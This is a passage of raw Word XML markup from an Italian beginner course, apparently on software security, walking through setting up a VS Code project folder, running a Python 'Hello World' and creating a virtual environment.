        <w:t xml:space="preserve">D’ora in avanti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">tutto il codice del corso vivrà in una cartella sul tuo computer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Creiamola con calma.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri il file manager del sistema operativo (Esplora File su Windows, Finder su macOS).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vai nella tua cartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Documenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crea una nuova cartella chiamata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri VS Code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dal menu in alto:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">File → Apri cartella…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(su macOS:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">File → Apri…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Seleziona la cartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che hai appena creato e conferma.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso VS Code mostra a sinistra la cartella aperta (vuota). È il tuo spazio di lavoro per tutto il corso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Convenzione importante:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non mettere spazi né caratteri accentati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nei nomi delle cartelle e dei file di programmazione.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">✓ ,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">✗ ,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso_sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">✓ ,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corsoSicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">✓ . Gli spazi creano problemi nei comandi del terminale; gli accenti possono creare problemi di codifica caratteri.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="37" w:name="aprire-il-terminale-dentro-vs-code"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aprire il terminale dentro VS Code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una delle cose comode di VS Code è che ha un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">terminale integrato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Aprilo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Menu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Terminale → Nuovo terminale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, oppure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">premi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + ò</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Windows) o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Mac) — è il tasto che genera il backtick, sopra il Tab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Si apre una striscia in basso con il prompt. Importante:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">questo terminale è già</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dentro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">la cartella</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, perché VS Code lo apre automaticamente nel contesto del progetto. Verifica scrivendo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Devi vedere un percorso che termina con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Se è così, sei pronto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="39" w:name="la-tua-prima-app-python-hello-world"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="444" w:name="sec_0_6"/>
      <w:r>
        <w:t xml:space="preserve">0.6 La tua prima app Python:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Hello World</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="444"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prima di toccare argomenti seri, scriviamo un programma minimale per essere sicuri che tutto funzioni.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nella barra laterale di VS Code, clicca con il tasto destro sulla cartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e scegli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Nuovo file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chiamalo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">hello.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(l’estensione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dice a VS Code che è un file Python).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Si apre il file vuoto. Scrivici dentro questa singola riga:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Ciao mondo!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Salva con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Windows) o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cmd + S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Mac).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso esegui il file. Nel terminale integrato di VS Code, scrivi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python hello.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 hello.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su macOS). Premi Invio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Devi vedere stampato:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ciao mondo!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se vedi questa riga,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Python e VS Code parlano correttamente fra loro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Hai eseguito il tuo primo programma. Da qui parte tutto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="45" w:name="X3bd141e1497c9dbfa618d52d6df9a4ab000b946"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="445" w:name="sec_0_7"/>
      <w:r>
        <w:t xml:space="preserve">0.7 Ambienti virtuali: cosa sono e perché sono obbligatori</w:t>
      </w:r>
      <w:bookmarkEnd w:id="445"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso una digressione che sembra noiosa ma evita ore di problemi futuri.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="40" w:name="il-problema"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il problema</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python ti permette di installare migliaia di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">librerie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aggiuntive — pezzi di codice già scritti da altri che puoi usare nei tuoi programmi. Per gestirle si usa un comando chiamato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Per esempio, per usare Flask scriverai prima o poi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install flask</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se installi Flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">globalmente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(cioè a livello di sistema), funziona. Ma cosa succede quando:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">progetto A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ha bisogno di Flask versione 2.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">progetto B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ha bisogno di Flask versione 3.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se installi globalmente, ne sopravvive solo una versione. Uno dei due progetti smetterà di funzionare. E se domani il tuo cliente ti chiede di lavorare su un terzo progetto vecchio che usa Python 3.8 e Flask 1.1, sei spacciato.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="41" w:name="la-soluzione-ambienti-virtuali"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La soluzione: ambienti virtuali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ambiente virtuale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in inglese</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">virtual environment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, abbreviato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">venv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) è una cartella autonoma che contiene una copia isolata di Python e tutte le sue librerie. Ogni progetto ha il suo ambiente virtuale, separato da tutti gli altri. Se in un ambiente installi Flask 2.0 e in un altro Flask 3.0,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non si vedono fra loro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Se rompi tutto in un ambiente, butti la cartella e ne crei uno nuovo senza danni collaterali.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Regola d’oro:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ogni progetto Python serio sta dentro un suo ambiente virtuale. Punto. Vale anche per il corso.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:id="42" w:name="creare-lambiente-virtuale-del-corso"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creare l’ambiente virtuale del corso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nel terminale integrato di VS Code (assicurati di essere nella cartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), digita:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python -m venv venv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Decifrazione del comando:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ l’interprete Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-m venv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">esegui il modulo chiamato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">venv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(è incluso in Python di default)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
